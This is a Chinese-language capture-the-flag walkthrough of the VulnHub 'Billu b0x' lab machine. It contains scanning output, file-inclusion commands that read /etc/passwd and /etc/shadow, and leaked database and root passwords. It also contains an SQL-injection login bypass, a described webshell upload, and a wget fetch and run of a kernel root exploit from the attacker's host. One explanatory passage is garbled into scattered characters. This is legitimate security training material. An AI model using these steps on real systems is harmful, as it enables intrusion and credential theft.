BILLU: B0X
https://www.vulnhub.com/entry/billu-b0x,188/
主机发现
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.16
Host is up (0.00037s latency).
MAC Address: 00:0C:29:CF:17:E3 (VMware)
nmap扫描
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# nmap --min-rate 10000 -p- 192.168.54.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-21 10:56 CST
Nmap scan report for 192.168.54.16
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:CF:17:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# nmap -sT -sV -O -p22,80 192.168.54.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-21 10:56 CST
Nmap scan report for 192.168.54.16
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:CF:17:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# nmap -sU -p22,80 192.168.54.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-21 10:57 CST
Nmap scan report for 192.168.54.16
Host is up (0.00043s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:CF:17:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# nmap --script=vuln -p22,80 192.168.54.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-21 10:57 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.16
Host is up (0.00033s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /test.php: Test page
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:CF:17:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 55.37 seconds
web渗透
目录爆破
# yunki @ yunki in ~ [11:40:48]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.16
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.16
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/21 11:42:40 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://192.168.54.16/images/]
/index (Status: 200) [Size: 3267]
/c (Status: 200) [Size: 1]
/in (Status: 200) [Size: 47522]
/show (Status: 200) [Size: 1]
/add (Status: 200) [Size: 307]
/test (Status: 200) [Size: 72]
/head (Status: 200) [Size: 2793]
/uploaded_images (Status: 301) [Size: 324] [--> http://192.168.54.16/uploaded_images/]
/panel (Status: 302) [Size: 2469] [--> index.php]
/head2 (Status: 200) [Size: 2468]
/server-status (Status: 403) [Size: 294]
===============================================================
2023/03/21 11:43:29 Finished
===============================================================
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test
'file' parameter is empty. Please provide file path in 'file' parameter
这句话什么意思?用file包含文件?那就测试一下。发现可以包含本地文件
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test --data file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test --data file=/etc/shadow
curl: (18) transfer closed with 897 bytes remaining to read
那这里就看一下他这个index.php主页的sql代码。
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test --data file=./index.php 18 ⨯
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
$_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='')
{
echo "you are logged in :)";
header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un>   Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "You are allowed<br>";
$_SESSION['logged']=true;
$_SESSION['admin']=$row['username'];
header('Location: panel.php', true, 302);
}
else
{
echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
再看看其他文件。
in.php
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test --data file=./in.php
<?php
phpinfo();
?>
c.php
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# curl http://192.168.54.16/test --data file=./c.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>
这里的sql代码为
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
根据sql代码构造sqli代码。实际上的SQL语句就是select * from auth where pass=‘
p
a
s
s
′
a
n
d
u
n
a
m
e
=
′
pass' and uname='
pass′anduname=′uname’。
因此我们可以构造name为or 1=1#,password为\,这样子SQL语句就变为了select * from auth where pass=‘’ and uname=‘or 1=1#’,也就完成了登录绕过。
看看能不能上传文件。
可以上传,那能不能写个木马进去呢?
重新上传。
这里最后一个是我上传的带马图片。那 现在问题来了。如何以php代码运行这个图片呢?这里由于图片是在panel页面进行显示,那这里使用抓包,使用pane页面包含该图片尝试。
这里出现了图片内容。那尝试输入指令。
发现可以执行,那就上传反弹shell代码。
发现没有反应,应该想到有没有可能是编码问题?urlencode一下。
获得系统初始权限
$ whoami
www-data
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:cf:17:e3 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.16/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecf:17e3/64 scope link
valid_lft forever preferred_lft forever
$
$ uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
$
提权
方法1:内核提权
kali端
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# searchsploit Linux indishell 3.13
Exploits: No Results
Shellcodes: No Results
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# searchsploit Linux 3.13 | grep -i "privilege" 130 ⨯
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escalation | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/sh | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | linux/local/40503.rb
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) | linux_x86-64/local/31347.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / | linux/local/47169.c
Nagios < 4.2.4 - Local Privilege Escalation | linux/local/40921.sh
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation | linux/local/42305.txt
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation | linux/local/41196.txt
pam-krb5 < 3.13 - Local Privilege Escalation | linux/local/8303.c
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation | linux/webapps/48443.py
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation | linux/local/43935.txt
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation | linux/local/42936.md
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# searchsploit -m 37292.c
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines, with CRLF line terminators
Copied to: /home/yunki/vulnhub/billub0x/37292.c
┌──(root💀yunki)-[/home/yunki/vulnhub/billub0x]
└─# php -S 0:80
[Tue Mar 21 12:42:36 2023] PHP 7.4.15 Development Server (http://0:80) started
靶机shell端
www-data@indishell:/var/www$ cd /tmp
cd /tmp
www-data@indishell:/tmp$ wget http://192.168.54.128/37292.c
wget http://192.168.54.128/37292.c
--2023-03-21 10:48:29-- http://192.168.54.128/37292.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-c]
Saving to: `37292.c'
100%[======================================>] 5,119 --.-K/s in 0s
2023-03-21 10:48:30 (618 MB/s) - `37292.c' saved [5119/5119]
www-data@indishell:/tmp$ gcc 37292.c -o 37292
gcc 37292.c -o 37292
www-data@indishell:/tmp$ chmod +x 37292
chmod +x 37292
www-data@indishell:/tmp$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:cf:17:e3 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.16/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecf:17e3/64 scope link
valid_lft forever preferred_lft forever
方法2:phpadmin信息暴露提权
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@indishell:/var/www$ cat phpmy/config.inc.php
cat phpmy/config.inc.php
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>
发现用户名密码,这里首先登录mysql,没有发现有用信息,尝试密码碰撞。ssh登录。成功!
# yunki @ yunki in ~ [12:39:53]
$ ssh root@192.168.54.16
The authenticity of host '192.168.54.16 (192.168.54.16)' can't be established.
ECDSA key fingerprint is SHA256:UyLCTuDmpoRJdivxmtTOMWDk0apVt5NWjp8Xno1e+Z4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.16' (ECDSA) to the list of known hosts.
root@192.168.54.16's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Mar 21 10:10:08 IST 2023
System load: 0.0 Processes: 113
Usage of /: 12.4% of 9.61GB Users logged in: 0
Memory usage: 13% IP address for eth0: 192.168.54.16
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@indishell:~# whoami
root
root@indishell:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:cf:17:e3 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.16/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecf:17e3/64 scope link
valid_lft forever preferred_lft forever
392
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
